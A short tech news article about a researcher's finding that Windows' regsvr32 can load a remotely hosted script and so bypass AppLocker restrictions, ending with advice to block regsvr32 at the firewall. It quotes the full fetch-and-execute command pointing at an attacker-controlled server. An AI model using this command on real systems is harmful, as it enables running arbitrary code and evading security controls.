A regsvr32 hack is all it takes to bypass Windows' AppLocker security
A security researcher has discovered a way to get around Windows' AppLocker security system. Casey Smith found that it was possible to use Regsvr32 to call up a remotely hosted file that could be used to run any application -- malicious or otherwise -- of your choice.
This is something that will be a concern to companies, many of whom rely on AppLocker as it restricts what users are able to run on their computers. What is particularly concerning is the fact that the exploit does not require administrator privileges, and doesn't make any changes to the registry which makes it difficult to detect.
Smith uncovered the exploit whilst looking to install a reverse shell on a computer with restrictions in place. After playing around for a while he discovered that a simple command could be used to execute a script. The beauty of the solution -- aside from the lack of privileges needed -- is that it should just show up in logs as regular HTTP or HTTPS traffic, reducing the likelihood of detection.
The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc...And.. You guessed a signed, default MS binary. Whohoo.
So, all you need to do is host your .sct file at a location you control. From the target, simply execute
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Its not well documented that regsvr32.exe can accept a url for a script.
At the moment, there is no patch available for the exploit -- it could be argued that it's a feature that is included by design -- but if you want to be on the safe side, you might want to consider blocking Regsvr32 with your firewall.
Photo credit: McIek / Shutterstock